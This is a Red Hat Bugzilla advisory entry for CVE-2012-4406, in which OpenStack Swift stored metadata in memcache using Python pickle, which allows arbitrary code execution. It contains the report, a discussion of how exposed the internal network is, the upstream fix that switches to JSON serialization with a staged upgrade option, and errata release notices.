Bug 854757 (CVE-2012-4406) - CVE-2012-4406 Openstack-Swift: insecure use of python pickle()
Summary: CVE-2012-4406 Openstack-Swift: insecure use of python pickle()
Keywords:
Status: CLOSED ERRATA
Alias: CVE-2012-4406
Product: Security Response
Classification: Other
Component: vulnerability
Version: unspecified
Hardware: All
OS: Linux
high
high
Target Milestone: ---
Assignee: Red Hat Product Security
QA Contact:
URL:
Whiteboard:
Depends On: 854758 854761 856786 879710
Blocks: 836072 854783 886367
TreeView+ depends on / blocked
 
Reported: 2012-09-05 18:42 UTC by Kurt Seifried
Modified: 2023-05-12 21:29 UTC (History)
6 users (show)

Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Clone Of:
Environment:
Last Closed: 2013-05-25 06:26:36 UTC
Embargoed:

Attachments (Terms of Use)
CVE-2012-4406-python-pickle.patch (14.26 KB, patch)
2012-09-06 03:22 UTC, Kurt Seifried 		no flags Details | Diff
View All


Links
System ID Private Priority Status Summary Last Updated
Launchpad 1006414 0 None None None 2012-09-06 15:45:15 UTC
Red Hat Product Errata RHSA-2012:1379 0 normal SHIPPED_LIVE Important: openstack-swift security update 2012-10-16 21:44:31 UTC
Red Hat Product Errata RHSA-2013:0691 0 normal SHIPPED_LIVE Important: Red Hat Storage 2.0 security, bug fix, and enhancement update #4 2013-03-29 02:21:19 UTC

Description Kurt Seifried 2012-09-05 18:42:45 UTC 
Sebastian Krahmer (krahmer) reports:

swift uses pickle to store and load meta data. pickle is insecure
and allows to execute arbitrary code in loads().
[...]
BTW, you can read more on executing code via pickle or cPickle here:
http://nadiana.com/python-pickle-insecure

https://bugs.launchpad.net/swift/+bug/1006414

Additionally:

==
Pickle is insecure in a model where an untrusted user can provide the pickled 
data. In the Swift model the data is pickled by Swift itself and stored in 
memcache, so the attack vector would suppose direct write access by an 
untrusted user to memcached data ?

==
memcached on Swift runs on every proxy servers and shared a cache so it bind 
on the internal network ip. For swift we always assume that the internal 
network needs to be secure since Swift has been designed this way.

==
The commit message for the fix:

Reviewed: https://review.openstack.org/9105
Committed: http://github.com/openstack/swift/commit/e1ff51c04554d51616d2845f92ab726cb0e5831a
Submitter: Jenkins
Branch: master

commit e1ff51c04554d51616d2845f92ab726cb0e5831a
Author: Vincent Untz <vuntz>
Date: Thu Jun 21 14:37:41 2012 +0200

    Do not use pickle for serialization in memcache, but JSON

    We don't want to use pickle as it can execute arbitrary code. JSON is
    safer. However, note that it supports serialization for only some
    specific subset of object types; this should be enough for what we need,
    though.

    To avoid issues on upgrades (unability to read pickled values, and cache
    poisoning for old servers not understanding JSON), we add a
    memcache_serialization_support configuration option, with the following
    values:

     0 = older, insecure pickle serialization
     1 = json serialization but pickles can still be read (still insecure)
     2 = json serialization only (secure and the default)

    To avoid an instant full cache flush, existing installations should
    upgrade with 0, then set to 1 and reload, then after some time (24
    hours) set to 2 and reload. Support for 0 and 1 will be removed in
    future versions.

    Part of bug 1006414.

    Change-Id: Id7d6d547b103b4f23ebf5be98b88f09ec6027ce4
Comment 2 Kurt Seifried 2012-09-05 18:51:27 UTC 
Created openstack-swift tracking bugs for this issue

Affects: fedora-all [bug 854761]
Comment 3 Kurt Seifried 2012-09-06 03:22:23 UTC 
Created attachment 610156 [details]
CVE-2012-4406-python-pickle.patch
Comment 4 Tomas Hoger 2012-09-06 16:24:38 UTC 
(In reply to comment #0)
> Sebastian Krahmer reports:

His post is:
http://thread.gmane.org/gmane.comp.security.oss.general/8309
Comment 5 Kurt Seifried 2012-09-12 19:26:16 UTC 
Created openstack-swift tracking bugs for this issue

Affects: epel-6 [bug 856786]
Comment 6 Murray McAllister 2012-09-27 02:28:49 UTC 
Acknowledgements:

Red Hat would like to thank Sebastian Krahmer of the SUSE Security Team for reporting this issue.
Comment 7 errata-xmlrpc 2012-10-16 17:45:52 UTC 
This issue has been addressed in following products:

  OpenStack Essex for RHEL 6

Via RHSA-2012:1379 https://rhn.redhat.com/errata/RHSA-2012-1379.html
Comment 8 errata-xmlrpc 2013-03-28 22:21:54 UTC 
This issue has been addressed in following products:

  Red Hat Storage 2.0
  Red Hat Storage 2.0 Console
  Native Client for RHEL 5 for Red Hat Storage
  Native Client for RHEL 6 for Red Hat Storage

Via RHSA-2013:0691 https://rhn.redhat.com/errata/RHSA-2013-0691.html
Comment 9 errata-xmlrpc 2013-03-28 22:29:11 UTC 
This issue has been addressed in following products:

  Red Hat Storage 2.0
  Red Hat Storage 2.0 Console
  Native Client for RHEL 5 for Red Hat Storage
  Native Client for RHEL 6 for Red Hat Storage

Via RHSA-2013:0691 https://rhn.redhat.com/errata/RHSA-2013-0691.html
Note You need to log in before you can comment on or make changes to this bug.